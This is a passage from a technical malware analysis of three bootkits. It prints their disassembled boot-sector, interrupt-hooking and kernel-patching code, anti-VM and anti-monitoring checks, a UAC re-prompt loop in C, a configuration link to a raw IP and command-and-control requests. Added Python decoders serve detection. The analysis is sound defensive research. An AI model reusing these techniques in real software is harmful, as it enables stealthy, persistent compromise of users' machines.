DownLoadIniTime=120
PopAdTime=2
DownLoadDelayTime=1
RunDelayTime=0
FirstRunExeTime=2
FirstPopwidTime=1
cjver=2
cjaddr=
[Link]
Link1=|http://66.79.163.187:55325/tuling.html



Though the Alipop Trojan uses the boot sector 
infection technique, it can be detected and re- 
moved easily, because no methods are used 
to hide the malicious activity. 

The bootkit does not protect its boot sector 
code from disinfection. It is therefore possible 
to clean the infected system by manually edit- 
ing the boot record with any 16-bit hex editor 
(such as WinHex). 
Mebratix.b (Ghost Shadow) 

The Mebratix bootkit was mentioned for the 
first time in an entry on the Symantec Security 
Response blog (tinyurl.com/3xedn5j). 

The bootkit's installer (MD5: 
1b465d5c330d99bdccffd299bf71010f, about 
30 kB) does not have any notable characteris- 
tics. 

Boot code 

Mebratix' boot code is an almost perfect clone 
of the standard Windows boot code. Let's take 
a closer look at the two disassembled codes. 



Windows boot code: 

seg000:00CA                 mov     ax, 201h        ; interrupt 13h (02h, read data from disk)
                                                    ; ah - number of function of 13h
                                                    ; al - amount of sectors being read
seg000:00CD                 mov     bx, 7C00h       ; address of buffer for data read
seg000:00D0                 mov     cx, [bp+2]      ; number of track and sector (bp points to a record in partition table)
seg000:00D3                 mov     dx, [bp+0]      ; number of head and disk
seg000:00D6                 int     13h
seg000:00D8                 jnb     short locret_12B

Mebratix boot code: 

seg000:00CA                 mov     ax, 201h        ; interrupt 13h (02h, read data from disk)
                                                    ; ah - number of function of 13h
                                                    ; al - amount of sectors being read
seg000:00CD                 mov     bx, 7C00h       ; address of buffer for data read
seg000:00D0                 mov     cx, 2           ; number of track and sector
seg000:00D3                 mov     dx, [bp+0]      ; number of head and disk
seg000:00D6                 int     13h
seg000:00D8                 jnb     short locret_12B



As you can see, Mebratix' boot code differs 
from the standard boot code in the operand of 
the mov instruction at offset 00D0h from the 
start of the boot code. As the developer in- 
tended, the original code reads and transfers 
control to the first sector of the boot partition, 
whereas the bootkit's code transfers control to 
the second sector of the disk, which holds the 
continuation of the malicious code. 
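A way to check the int 13h read set-up of a boot sector programmatically, as an added example (not code from the article): the decoder follows the mov chain at offset 0CAh up to int 13h and reports whether the CHS values come from the partition table, as in the standard Windows MBR, or are hard-coded, as in the Mebratix listing above. The two instruction sequences are taken from the listings; the sample sectors around them are constructed filler.

```python
"""Decode the int 13h read set-up of a 512-byte MBR (added example, not code
from the article). The standard Windows and Mebratix instruction sequences at
offset 0CAh are taken from the two listings; the rest of each sample sector is
constructed filler so the code runs offline."""
import struct

READ_SETUP_OFFSET = 0xCA  # mov ax, 201h starts here in both listings
SECTOR_SIZE = 512

# Standard Windows boot code: CHS for the read comes from the partition table
# entry that bp points to (mov cx, [bp+2] / mov dx, [bp+0]).
STANDARD_READ_SETUP = bytes.fromhex("B80102 BB007C 8B4E02 8B5600 CD13 7351")
# Mebratix: the difference is mov cx, 2 (B9 02 00) at offset 0D0h.
MEBRATIX_READ_SETUP = bytes.fromhex("B80102 BB007C B90200 8B5600 CD13 7351")


def build_sample_mbr(read_setup: bytes) -> bytes:
    """Constructed sector: zero filler, the read set-up at 0CAh, 55AA signature."""
    sector = bytearray(SECTOR_SIZE)
    sector[READ_SETUP_OFFSET:READ_SETUP_OFFSET + len(read_setup)] = read_setup
    sector[510:512] = b"\x55\xAA"
    return bytes(sector)


def decode_read_setup(mbr: bytes) -> dict:
    """Follow the mov chain up to int 13h and record where each register comes from.

    Returns {"ax"/"bx"/"cx"/"dx": ("imm", value) or ("bp", displacement)}.
    Only the encodings that appear in the listings are handled.
    """
    if len(mbr) != SECTOR_SIZE or mbr[510:512] != b"\x55\xAA":
        raise ValueError("not a 512-byte sector with a 55AA signature")
    mov_imm16 = {0xB8: "ax", 0xB9: "cx", 0xBA: "dx", 0xBB: "bx"}
    mov_bp = {0x4E: "cx", 0x56: "dx"}  # ModRM bytes of mov cx/dx, [bp+disp8]
    regs = {}
    pos = READ_SETUP_OFFSET
    while pos < SECTOR_SIZE - 2:
        op = mbr[pos]
        if op in mov_imm16:
            (imm,) = struct.unpack_from("<H", mbr, pos + 1)
            regs[mov_imm16[op]] = ("imm", imm)
            pos += 3
        elif op == 0x8B and mbr[pos + 1] in mov_bp:
            regs[mov_bp[mbr[pos + 1]]] = ("bp", mbr[pos + 2])
            pos += 3
        elif op == 0xCD and mbr[pos + 1] == 0x13:
            return regs
        else:
            raise ValueError(f"unexpected opcode {op:#04x} at offset {pos:#x}")
    raise ValueError("int 13h not found")


def describe_read(regs: dict) -> dict:
    """Interpret the registers as int 13h/AH=02h parameters."""
    ax = regs["ax"][1]
    info = {"function": ax >> 8, "sectors": ax & 0xFF, "buffer": regs["bx"][1]}
    kind, val = regs["cx"]
    if kind == "bp":
        info["chs"] = "from partition table entry (bp+%d)" % val
        info["fixed_chs"] = None
    else:
        # CH = cylinder bits 0-7, CL bits 6-7 = cylinder bits 8-9, CL bits 0-5 = sector
        ch, cl = val >> 8, val & 0xFF
        info["chs"] = "hard-coded"
        info["fixed_chs"] = (((cl & 0xC0) << 2) | ch, cl & 0x3F)
    kind, val = regs["dx"]
    if kind == "bp":
        info["drive_head"] = "from partition table entry (bp+%d)" % val
    else:
        info["drive_head"] = (val & 0xFF, val >> 8)  # DL = drive, DH = head
    return info


def reads_from_partition_table(mbr: bytes) -> bool:
    """True when both CHS words come from the partition table, as in the standard MBR."""
    regs = decode_read_setup(mbr)
    return regs["cx"][0] == "bp" and regs["dx"][0] == "bp"


STANDARD_MBR = build_sample_mbr(STANDARD_READ_SETUP)
MEBRATIX_MBR = build_sample_mbr(MEBRATIX_READ_SETUP)

if __name__ == "__main__":
    for name, mbr in (("standard", STANDARD_MBR), ("mebratix", MEBRATIX_MBR)):
        print(name, describe_read(decode_read_setup(mbr)))
```

On the Mebratix sample the decoder reports function 02h, one sector into 0:7C00h, with cylinder 0 / sector 2 hard-coded, which is exactly the second-sector read described above.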



Figure 11. Mebratix boot code (hex dump of mbr.bin viewed in Far; the instruction that differs from the standard boot code is highlighted). 
The bootkit's code in the second sector of the 
disk reserves 63 kB of base memory in the 
same way as the Alipop bootkit. Then it copies 
itself to 9700:0000h and sets a hook for inter- 
rupt 13h: 



seg000:0229                 mov     si, 533h
seg000:022C                 xor     si, 120h                ; read instruction from 0040h:0013h (base memory size in kB)
seg000:0230                 lodsw
seg000:0231                 sub     si, 2
seg000:0234                 shl     ax, 6
seg000:0237                 and     ax, 0FFFh
seg000:023A                 shr     ax, 6
seg000:023D                 sub     [si], ax                ; reserve 63 kB of a base memory
seg000:023F                 xor     eax, eax
seg000:0242                 mov     ax, 9700h
seg000:0245                 mov     es, ax
seg000:0247                 assume es:nothing
seg000:0247                 shl     eax, 4
seg000:024B                 mov     si, 7C00h
seg000:024E                 xor     di, di
seg000:0250                 mov     ecx, 100h
seg000:0256                 rep movsw                       ; copy code of 2nd sector to 9700:0000h
seg000:0258                 mov     es:0Eh, eax
seg000:025D                 xor     bx, bx
seg000:025F                 mov     eax, [bx+4Ch]
seg000:0263                 mov     word ptr [bx+4Ch], 0F9h ; set address of 13h interrupt handler
seg000:0268                 mov     es:106h, eax            ; save address of original handler
seg000:026D                 mov     word ptr [bx+4Eh], es   ; set new value of handler selector
seg000:0270                 push    es
seg000:0271                 push    75h                     ; transfer of control to the code by 75h offset
seg000:0274                 retf



The next part of the boot code reads 59 sectors 
of the HDD (starting with sector 3) into memory 
at 9700:0200h. These sectors contain all the 
other bootkit components. Moreover, sectors 
3 to 6 are ciphered with an xor operation whose 
key byte is calculated dynamically at each itera- 
tion. Below is the fragment of the code that de- 
ciphers the sectors. 



seg000:0297                 mov     esi, 200h               ; pointer to read data
seg000:029D                 mov     ebx, 3333h              ; start constant for key calculation
seg000:02A3                 mov     ecx, 600h               ; size of data for deciphering (3 sectors)
seg000:02A9
seg000:02A9 loc_2A9:
seg000:02A9                 call    GetXorKey               ; gen key for current iteration
seg000:02AC                 xor     [esi], al
seg000:02AF                 add     esi, 1
seg000:02B3                 sub     ecx, 1
seg000:02B7                 jnz     short loc_2A9

seg000:03C5 GetXorKey       proc near                       ; key calculation
seg000:03C5                 imul    ebx, 343FDh
seg000:03CC                 add     ebx, 269EC3h
seg000:03D3                 mov     eax, ebx
seg000:03D6                 shr     eax, 10h
seg000:03DA                 and     eax, 0FFh
seg000:03E0                 retn
seg000:03E0 GetXorKey       endp



It is possible that the key calculation code was 
placed in a separate procedure to allow poly- 
morphic encryption, but the bootkits found in 
the wild used statically encrypted code. 

The 13h interrupt handler modifies the 
OSLOADER.EXE code in exactly the same way 
as the Alipop bootkit. 
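The deciphering loop and GetXorKey from the listing above, reimplemented as an added example (not the bootkit's or the article's code): the multiplier 343FDh and increment 269EC3h are the constants of the Microsoft CRT rand() generator, and the keystream depends only on the seed 3333h, which is why the encryption is static rather than polymorphic. The 8-sector disk image is constructed; a known plaintext is ciphered with the same keystream to give the deciphering routine realistic input.

```python
"""Mebratix sector decipher (added example, not code from the article).

Re-implements GetXorKey and the loop at loc_2A9: ebx is seeded with 3333h,
each step computes ebx = ebx * 343FDh + 269EC3h and the key byte is
(ebx >> 16) & 0FFh. The sample disk image is constructed; XOR is symmetric,
so ciphering a known plaintext with the same keystream yields realistic input."""

LCG_MULT = 0x343FD         # imul ebx, 343FDh
LCG_INC = 0x269EC3         # add  ebx, 269EC3h
KEY_SEED = 0x3333          # mov  ebx, 3333h (start constant for key)
SECTOR_SIZE = 512
CIPHERED_FIRST_SECTOR = 3  # ciphered data starts at disk sector 3 (1-based, as in the article)
CIPHERED_LENGTH = 0x600    # mov ecx, 600h (3 sectors)


def get_xor_key(ebx: int):
    """One GetXorKey call: returns (key byte left in al, new ebx state)."""
    ebx = (ebx * LCG_MULT + LCG_INC) & 0xFFFFFFFF
    return (ebx >> 16) & 0xFF, ebx  # mov eax, ebx / shr eax, 10h / and eax, 0FFh


def keystream(length: int, seed: int = KEY_SEED) -> bytes:
    """The byte sequence the loop at loc_2A9 XORs over the read data."""
    out = bytearray()
    ebx = seed
    for _ in range(length):
        key, ebx = get_xor_key(ebx)
        out.append(key)
    return bytes(out)


def xor_with_keystream(data: bytes, seed: int = KEY_SEED) -> bytes:
    """Deciphers (or, equally, ciphers) data with the Mebratix keystream."""
    return bytes(b ^ k for b, k in zip(data, keystream(len(data), seed)))


def decipher_image_sectors(image: bytes, first_sector: int = CIPHERED_FIRST_SECTOR,
                           length: int = CIPHERED_LENGTH) -> bytes:
    """Return the plaintext of the ciphered region of a raw disk image.

    The bootkit reads sectors from first_sector into 9700:0200h and deciphers
    `length` bytes from there, so on disk the same bytes start at byte offset
    (first_sector - 1) * 512.
    """
    start = (first_sector - 1) * SECTOR_SIZE
    if start + length > len(image):
        raise ValueError("image too small for the ciphered region")
    return xor_with_keystream(image[start:start + length])


def build_sample_image(plaintext: bytes) -> bytes:
    """Constructed 8-sector image: the plaintext, ciphered, occupies sectors 3-5."""
    if len(plaintext) != CIPHERED_LENGTH:
        raise ValueError("plaintext must be exactly 600h bytes")
    image = bytearray(8 * SECTOR_SIZE)
    start = (CIPHERED_FIRST_SECTOR - 1) * SECTOR_SIZE
    image[start:start + CIPHERED_LENGTH] = xor_with_keystream(plaintext)
    return bytes(image)


# Constructed stand-in for the bootkit components: recognisable text padded to 600h bytes.
SAMPLE_PLAINTEXT = (b"MZ constructed Mebratix component " * 64)[:CIPHERED_LENGTH]
SAMPLE_IMAGE = build_sample_image(SAMPLE_PLAINTEXT)

if __name__ == "__main__":
    print(decipher_image_sectors(SAMPLE_IMAGE)[:40])
    print("first key bytes:", keystream(8).hex())
```

Because the keystream never depends on the ciphered data, a single run of keystream(0x600) is a fixed mask that can be applied to the sectors of any infected disk image.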
Protected mode code 

The bootkit's protected mode code is called 
from the modified OSLOADER.EXE module 
and serves to initialize and launch the boot- 
kit's kernel mode driver. Let's examine this 
code more thoroughly: 



seg001:00000604                 mov     esi, eax
seg001:00000606                 mov     eax, [esp-4]
seg001:0000060A                 and     eax, 0FFFFF000h         ; get address of BootDriverListHead variable
seg001:0000060F                 push    ebx
seg001:00000610                 call    $+5
seg001:00000615                 pop     ebx
seg001:00000616                 and     ebx, 0FFFFF000h
seg001:0000061C                 or      ebx, 600h               ; calculate address of bootkit's protected mode code by return address
seg001:00000622                 mov     [ebx], eax              ; save BootDriverListHead
seg001:00000624                 mov     eax, esi
seg001:00000626                 pop     ebx
seg001:00000627                 test    eax, eax
seg001:00000629                 pushf
seg001:0000062A                 jnz     short loc_634
seg001:0000062C                 add     dword ptr [esp+4], 0
seg001:00000631                 jmp     short loc_6??           ; target label unreadable in the source
seg001:00000634
seg001:00000634 loc_634:
seg001:00000634                 pusha
seg001:00000635                 call    $+5
seg001:0000063A                 pop     ebx
seg001:0000063B                 and     ebx, 0FFFFF000h
seg001:00000641                 lea     ecx, large ds:106h
seg001:00000647                 mov     eax, [ebx+ecx]          ; get saved address of 13h interrupt handler
seg001:0000064A                 mov     ecx, cr0
seg001:0000064D                 push    ecx
seg001:0000064E                 btr     ecx, 10h                ; reset WP-bit (disable virtual memory write-protection)
seg001:00000652                 mov     cr0, ecx
seg001:00000655                 or      byte ptr ds:0C0000000h, 3
seg001:0000065C                 mov     large ds:4Ch, eax       ; restore original 13h interrupt handler
seg001:00000661                 mov     byte ptr ds:0C0000000h, 20h
seg001:00000668                 pop     ecx
seg001:00000669                 mov     cr0, ecx                ; set the WP-bit again
seg001:0000066C                 or      ebx, 600h
seg001:00000672                 mov     eax, [ebx]              ; BootDriverListHead
seg001:00000674                 sub     ebx, 600h
seg001:0000067A                 mov     esi, eax
seg001:0000067C
seg001:0000067C loc_67C:
seg001:0000067C                 mov     esi, [esi]              ; pointer to _LDR_DATA_TABLE_ENTRY entry for specific module
seg001:0000067E                 cmp     esi, eax
seg001:00000680                 jz      loc_763
seg001:00000686                 mov     ecx, [esi+18h]          ; get module boot address from _LDR_DATA_TABLE_ENTRY
seg001:00000689                 cmp     word ptr [ecx], 'ZM'    ; check MZ signature of module's header

After executing this code, the bootkit searches through all the loaded executable modules to find a section with 200h or more bytes of free space at its end.

The bootkit's driver loader code is copied into the found module (this code is originally located in the HDD's sector 4).



seg001:000006C7 loc_6C7:
seg001:000006C7     sub     edx, 28h
seg001:000006CA     mov     ecx, [edx+8]          ; ecx - section virtual size
seg001:000006CD     or      ecx, 0FFFh
seg001:000006D3     sub     ecx, 1FFh
seg001:000006D9     add     ecx, [edx+0Ch]        ; Add VirtualAddress to ecx
seg001:000006DC     add     ecx, [esi+18h]        ; Add module loading address to ecx
seg001:000006DF     cmp     dword ptr [ecx], 0    ; check free space in the end of the section
seg001:000006E2     jnz     short loc_67C
seg001:000006E4     mov     edi, ecx
seg001:000006E6     push    edi
seg001:000006E7     lea     esi, [ebx+600h]
seg001:000006ED     mov     ecx, 80h
seg001:000006F2     rep movsd                     ; copy 200h bytes
In most cases, bootkits use '.data' to store code. This section belongs to the OS kernel image loaded into memory.

As you can see from the dump of the module's header, there is enough space to inject the loader code into the '.data' section.



kd> !dh -s nt

SECTION HEADER #5
   .data name
   1EEA0 virtual size
   6E800 virtual address
   16F00 size of raw data
   6E800 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
C8000040 flags
         Initialized Data
         Not Paged
         (no align specified)
         Read Write



To transfer control to the driver loader code, the bootkit modifies the nt!PspCreateProcess() kernel function in such a way that its beginning contains a call to the bootkit's driver loader instead of the nt!_SEH_prolog() function call.



The nt!PspCreateProcess() function code before modification:

kd> u nt!PspCreateProcess
nt!PspCreateProcess:
805d0866 681c010000      push    11Ch
805d086b 68c8a84d80      push    offset nt!ObWatchHandles+0x664
805d0870 e81bb3f6ff      call    nt!_SEH_prolog

The nt!PspCreateProcess() function code after modification:

kd> u nt!PspCreateProcess
nt!PspCreateProcess:
805c6a8c 681c010000      push    11Ch
805c6a91 68b09e4d80      push    offset nt!ObWatchHandles+0x664
805c6a96 e88af8f7ff      call    80546325



Since nt!PspCreateProcess() isn't exported by the kernel, the bootkit searches for it by analyzing the code of the exported nt!PsCreateSystemProcess() function, scanning byte by byte for the opcode of the first call instruction (E8h); its argument is the address of the nt!PspCreateProcess() function:



kd> u nt!PsCreateSystemProcess+0xa
nt!PsCreateSystemProcess+0xa:
805d11da 50              push    eax
805d11db 50              push    eax
805d11dc ff35d0c26780    push    dword ptr [nt!PspInitialSystemProcessHandle]
805d11e2 ff7510          push    dword ptr [ebp+10h]
805d11e5 ff750c          push    dword ptr [ebp+0Ch]
805d11e8 ff7508          push    dword ptr [ebp+8]
805d11eb e876f6ffff      call    nt!PspCreateProcess
805d11f0 5d              pop     ebp
The nt!PspCreateProcess() call is performed at the initialization of the executive kernel subsystem:



kd> kb
ChildEBP RetAddr  Args to Child
805499a0 8069c0dc 8066fb80 001f0fff 80549a24 nt!PspCreateProcess+0xa
80549a0c 8069b419 80078000 80549be8 8068509c nt!PspInitPhase0+0x34e
80549a58 8068509c 00000000 80078000 80552740 nt!PsInitSystem+0x13
80549be8 80691f28 00000000 80078000 8003fc00 nt!ExpInitializeExecutive+0x742
80549c3c 8068fa9f 805529a0 80552740 80549f00 nt!KiInitializeKernel+0x3b2
00000000 00000000 00000000 00000000 00000000 nt!KiSystemStartup+0x2bf



Driver loader

The code of the bootkit's kernel mode driver loader performs the following:

• Gets the PID of the current process with the nt!PsGetCurrentProcessId() function. If the received value differs from 4 (the fixed PID value for the System process), the nt!_SEH_prolog() call is made and control returns to nt!PspCreateProcess().

• Gets the address of the nt!PsLoadedModuleList kernel global variable through signature analysis of the nt!KeCapturePersistentThreadState() function code.

• Reserves 10000h bytes of memory for the image of the bootkit's kernel mode driver with the nt!ExAllocatePoolWithTag() function.

• Copies the headers and the sections of the driver into the allocated area of memory.

• Restores the modified nt!PspCreateProcess() function code.

• Calls the bootkit's driver entry point.

Driver and payload

The goal of the bootkit's driver is to inject user mode code into the explorer.exe process and to hook the IRP_MJ_READ/IRP_MJ_WRITE request handlers of the disk driver Disk.sys (\Driver\Disk). These hooks protect the disk sectors holding the bootkit components from read or rewrite attempts by antivirus software. It should be noted that the driver code is unstable: in some cases the Trojan fails to install the kernel hooks during its installation.

The user-mode code sends HTTP requests to the meifawu.com server. The Trojan configuration file is loaded from http://meifawu.com/n.txt.



Destination       Protocol   Info
116.255.134.227   HTTP       GET /count.aspx?i=075deddb0dedee574aea64cfa4926b12f7 ...
192.168.88.150    HTTP       HTTP/1.1
192.168.88.150    HTTP       [TCP Retransmission] HTTP/1.1 200 OK
116.255.134.227   HTTP       GET /n.txt HTTP/1.1
192.168.88.150    HTTP       HTTP/1.1 200 OK (text/plain)
192.168.88.150    HTTP       [TCP Retransmission] HTTP/1.1 200 OK (text/plain)

Figure 12. Server requests.



Black Internet Trojan Installer and self-defense

The Black Internet Trojan bootkit appeared only recently, and if we are to judge by the activity on antivirus Web forums, it is both the least known and the most widespread of all the new bootkits. One of the first sources of information about the infection was the English-language antivirus forum MajorGeeks, and some days later the Russian VirusInfo.

The bootkit's installer (MD5: e35310220715287c5765b273a1797836, about 1.2 MB) is protected with an unknown encrypter.

The deciphering procedure contains the code to detect VMware virtual machines:
.text:004010A3     push    401113h                   ; Address of SEH exception handler
.text:004010AD     push    large dword ptr fs:0
.text:004010B4     push    eax
.text:004010B5     mov     eax, 337h
.text:004010BA     pop     eax
.text:004010BB     mov     large fs:0, esp
.text:004010C2     mov     eax, 564D5868h            ; 'VMXh' - magic constant
.text:004010C7     mov     ebx, 0
.text:004010CC     mov     ecx, 0Ah
.text:004010D1     xchg    eax, ebx
.text:004010D2     push    ebx
.text:004010D3     push    eax
.text:004010D4     pop     ebx
.text:004010D5     pop     eax
.text:004010D6     mov     edx, 5658h                ; Number of VMware backdoor I/O port
.text:004010DB     in      eax, dx                   ; Read data from port. On usual machine (not virtual)
                                                     ; this instruction generates exception
To disable this bootkit's self-defense mechanism, add a line that disables the "VMware backdoor" to the end of the VMware configuration file (.vmx):

monitor_control.restrict_backdoor = "true"



The bootkit's installer detects whether it is running with limited permissions through a GetTokenInformation call with the TokenElevation parameter. If the execution is performed under UAC, the installer restarts its process in a loop.

Therefore, the user will keep getting warnings from the security system until he permits the execution of the bootkit's installer with maximum permissions.



// check os version for launch under windows vista and higher
GetVersionExW(&VersionInformation);
if (VersionInformation.dwMajorVersion >= 6)
{
    v4 = GetCurrentProcess();
    if (!OpenProcessToken(v4, 0x20008u, &TokenHandle) ||
        !GetTokenInformation(TokenHandle, TokenElevation, &TokenInformation, 4u, &ReturnLength))
        return 0;

    if (!TokenInformation)
    {
        // current process was launched with limited permissions
        if (GetModuleFileNameW(0, &Filename, 0x104u))
        {
            ExecInfo.cbSize = 60;
            ExecInfo.fMask = 0;
            ExecInfo.hwnd = 0;
            ExecInfo.lpVerb = L"runas";
            ExecInfo.lpFile = &Filename;
            ExecInfo.lpParameters = 0;
            ExecInfo.lpDirectory = 0;
            ExecInfo.nShow = 0;
            ExecInfo.hInstApp = 0;

            // Launch of another process instance
            while (!ShellExecuteExW(&ExecInfo));

            return 0;
        }
    }
}
[Figure 13 (image): User Account Control dialog "Do you want to allow the following program from an unknown publisher to make changes to this computer?", Program name: dropper.exe, Publisher: Unknown, File origin: Hard drive on this computer.]

Figure 13. UAC warning at installer launch.
Finally, the installer detects an active Process Monitor utility by looking up the specific value of its window class. This is performed just before the installation of the boot code to the disk:



.text:00402335 sub_402335 proc near
.text:00402335     push    0                         ; lpWindowName
.text:00402337     push    offset ClassName          ; "PROCMON_WINDOW_CLASS"
.text:0040233C     call    ds:FindWindowW
.text:00402342     neg     eax
.text:00402344     sbb     eax, eax
.text:00402346     neg     eax
.text:00402348     retn
.text:00402348 sub_402335 endp







Unlike other known bootkits, which store their components in 63 sectors before the first partition, the 
Black Internet Trojan stores its components in unlabeled area immediately after the last partition. 



[Process Monitor log excerpt (image): CreateFile on \Device\Harddisk0\DR0 with "Desired Access: Generic Read/Write, Disposition: Open"; DeviceIoControl with IOCTL_DISK_GET_LENGTH_INFO; then alternating ReadFile and WriteFile operations on \Device\Harddisk0\DR0, first at offset 0 and then at offsets around 216,310,272, mostly with Length: 512 and some larger writes (43,520; 32,768; 9,216; 25,088; 31,232); finally CloseFile.]



The bootkit's booting sector defines the location of this unlabeled area while reading the MBR- 
located partition table. Then the bootkit reads the 64 sectors with all the other components of the 
bootkit. 



seg000:001F     xor     eax, eax
seg000:0022     mov     si, 7BEh            ; si - pointer to partition table
seg000:0025     mov     cl, 4               ; Amount of records in partition table
...
seg000:0031 loc_31:
seg000:0031     cmp     [si+8], eax
seg000:0035     jb      short loc_3F
seg000:0037     mov     eax, [si+8]         ; set number of first sector of partition to eax
seg000:003B     add     eax, [si+0Ch]       ; summarize it with partition's size in sectors
seg000:003F loc_3F:
seg000:003F     add     si, 10h             ; Go to a next record in partition table
seg000:0042     loop    loc_31
seg000:0044     or      eax, eax
seg000:0047     jz      short loc_5F
seg000:0049     add     eax, 2              ; sector where reading should be started
seg000:004D     mov     cx, 40h             ; Amount of sectors being read
seg000:0050     mov     bx, 7C00h           ; Memory address to write data being read
seg000:0053     call    sub_A1              ; Function that reads data with 13h interrupt (AH=42h)
seg000:0056     jb      short loc_5F
seg000:0058     nop
seg000:0059     nop
seg000:005A     jmp     far ptr 0:7C00h     ; Transfer control to read code
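The partition-table walk above, replayed in Python as an added example (not the article's or the bootkit's code): it computes the sector the boot code would read its 40h sectors of components from, and, for the defender, the unallocated tail after the last partition that a disk scanner should image and inspect. The sample MBR and the disk size are constructed.

```python
import struct

SECTOR = 512
PT_OFFSET = 0x1BE    # si = 7BEh - 7C00h: the partition table inside the MBR
ENTRY_SIZE = 0x10    # add si, 10h
ENTRIES = 4          # mov cl, 4
SECTORS_READ = 0x40  # mov cx, 40h: the 64 sectors of bootkit components
SKIP = 2             # add eax, 2


def parse_partition_table(mbr: bytes):
    """Decode the four 16-byte entries; [si+8] is the start LBA, [si+0Ch] the size."""
    if len(mbr) < SECTOR or mbr[510:512] != b"\x55\xAA":
        raise ValueError("not a valid MBR (bad length or missing 55AA signature)")
    entries = []
    for i in range(ENTRIES):
        off = PT_OFFSET + i * ENTRY_SIZE
        start_lba, size = struct.unpack_from("<II", mbr, off + 8)
        entries.append({"index": i, "bootable": mbr[off] == 0x80,
                        "type": mbr[off + 4], "start_lba": start_lba, "sectors": size})
    return entries


def locate_component_area(mbr: bytes):
    """Replay the boot-sector loop: entries whose start LBA is below the running
    value in eax are skipped (cmp/jb), otherwise eax = start + size. The
    components start two sectors past the end found. Returns None on an empty
    table, the `or eax, eax` / jz path in the listing."""
    end = 0
    for e in parse_partition_table(mbr):
        if e["start_lba"] < end:
            continue
        end = e["start_lba"] + e["sectors"]
    if end == 0:
        return None
    return {"first_lba": end + SKIP, "sectors": SECTORS_READ}


def unallocated_tail(mbr: bytes, disk_sectors: int):
    """Defender's view: (start LBA, length) of the unlabeled area after the last
    partition, i.e. the range where this family hides its components."""
    end = max((e["start_lba"] + e["sectors"]
               for e in parse_partition_table(mbr) if e["type"] != 0), default=0)
    return (end, disk_sectors - end) if disk_sectors > end else (end, 0)


def build_sample_mbr(parts):
    """Constructed test MBR (not from the article): empty boot code, the given
    (type, start, size) entries and the 55AA signature."""
    mbr = bytearray(SECTOR)
    for i, (ptype, start, size) in enumerate(parts):
        off = PT_OFFSET + i * ENTRY_SIZE
        mbr[off + 4] = ptype
        struct.pack_into("<II", mbr, off + 8, start, size)
    mbr[510:512] = b"\x55\xAA"
    return bytes(mbr)


# Constructed: a 100 MB system partition, a larger data partition, 4 GB disk.
SAMPLE_MBR = build_sample_mbr([(0x07, 63, 204_800), (0x07, 204_863, 8_000_000)])
SAMPLE_DISK_SECTORS = 8_388_608

if __name__ == "__main__":
    print(locate_component_area(SAMPLE_MBR))            # {'first_lba': 8204865, 'sectors': 64}
    print(unallocated_tail(SAMPLE_MBR, SAMPLE_DISK_SECTORS))  # (8204863, 183745)
```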
Then the bootkit performs a series of standard actions that were described in the analysis of the previous 2 malicious programs:

• Reservation of 4 kB in the base memory.

• Interception of the 13h interrupt.

• Signature search and modification of the OSLOADER.EXE code in the int 13h handler.

• Reading and execution of the boot code of the system partition.

Next, we will examine the bootkit's protected mode code called from the modified OSLOADER.EXE module.



Protected mode code

The bootkit's protected mode code initializes the kernel mode driver loader. The following operations are performed for this purpose:

• Signature analysis of the nt!Phase1Initialization() function and detection of the nt!IoInitSystem() function entry point.

• Replacement of the nt!IoInitSystem() call with a call to the bootkit's driver loader.

• Copying the loader code into the area of memory right after the OS kernel.

The address of the _BlLoaderBlock structure, which contains a pointer to the list of loaded modules, is located by signature in the OSLOADER.EXE code.



seg001:000069D4     sub     dword ptr [esp], 6
seg001:000069D8     call    sub_6BB4              ; Get driver loader address (is saved in esi)
seg001:000069DD     mov     ecx, 5
seg001:000069E2     rep movsb
seg001:000069E4     sub     esi, 6
seg001:000069E7     mov     edi, [esp+2Ch]
seg001:000069EB     and     edi, 0FFF00000h
seg001:000069F1     mov     al, 0C7h              ; signature search for _BlLoaderBlock
seg001:000069F3 loc_69F3:
seg001:000069F3     scasb
seg001:000069F4     jnz     short loc_69F3
seg001:000069F6     cmp     dword ptr [edi], 40003446h
seg001:000069FC     jnz     short loc_69F3
seg001:000069FE loc_69FE:
seg001:000069FE     mov     al, 0A1h
seg001:00006A00     scasb
seg001:00006A01     jnz     short loc_69FE
seg001:00006A03     mov     eax, [edi]            ; eax - pointer to _BlLoaderBlock
seg001:00006A05     mov     eax, [eax]
seg001:00006A07     mov     eax, [eax]            ; _LDR_DATA_TABLE_ENTRY for a kernel
seg001:00006A09     mov     edi, [eax+18h]        ; kernel loading address
seg001:00006A0C     mov     ecx, [edi+3Ch]
seg001:00006A0F     mov     ecx, [ecx+edi+50h]    ; ecx - size of kernel image (SizeOfImage)
seg001:00006A13     call    sub_6B3D              ; search for nt!IoInitSystem() call in nt!Phase1Initialization() code (is saved in edx)
seg001:00006A18     jnz     short loc_6A66
seg001:00006A1A     mov     edx, [ebx]            ; Relocation of original instruction call nt!IoInitSystem()
seg001:00006A1C     lea     edx, [ebx+edx+4]
seg001:00006A20     mov     [esi+0Ah], edx
seg001:00006A23     add     edi, ecx
seg001:00006A25     jmp     short loc_6A36
...
seg001:00006A36 loc_6A36:
seg001:00006A36     add     edi, 0FFFh
seg001:00006A3C     and     edi, 0FFFFF000h
seg001:00006A42     sub     edi, 800h
seg001:00006A48     mov     ecx, 6A3h
seg001:00006A4D     push    edi
seg001:00006A4E     rep movsb                     ; copying driver loader to the area of memory right after OS kernel
seg001:00006A50     pop     edi
seg001:00006A51     add     edi, 0Eh
seg001:00006A54     sub     edi, ebx
seg001:00006A56     sub     edi, 4
seg001:00006A59     mov     [ebx], edi            ; Modification of nt!IoInitSystem() call
seg001:00006A5B     xchg    esi, edi
seg001:00006A5D     mov     ecx, 644h
seg001:00006A62     sub     edi, ecx
seg001:00006A64     rep stosb
The previous listing contains the algorithm for installing the nt!IoInitSystem() function hook. Let's take a closer look at the interception itself. The code of the nt!Phase1Initialization() function before the modification:

nt!Phase1Initialization+0x9a1:
806b5fc9 6a4b            push    4Bh
806b5fcb 6a19            push    19h
806b5fcd e83877e6ff      call    nt!InbvSetProgressBarSubset
806b5fd2 ffb590fbffff    push    dword ptr [ebp-470h]
806b5fd8 e859ff0000      call    nt!IoInitSystem
806b5fdd 84c0            test    al,al

The code of the nt!Phase1Initialization() function after the modification:

nt!Phase1Initialization+0x9a1:
806b5fc9 6a4b            push    4Bh
806b5fcb 6a19            push    19h
806b5fcd e83877e6ff      call    nt!InbvSetProgressBarSubset
806b5fd2 ffb590fbffff    push    dword ptr [ebp-470h]
806b5fd8 e831988100      call    80ecf80e
806b5fdd 84c0            test    al,al

Driver loader

The kernel mode driver loader performs the following operations:

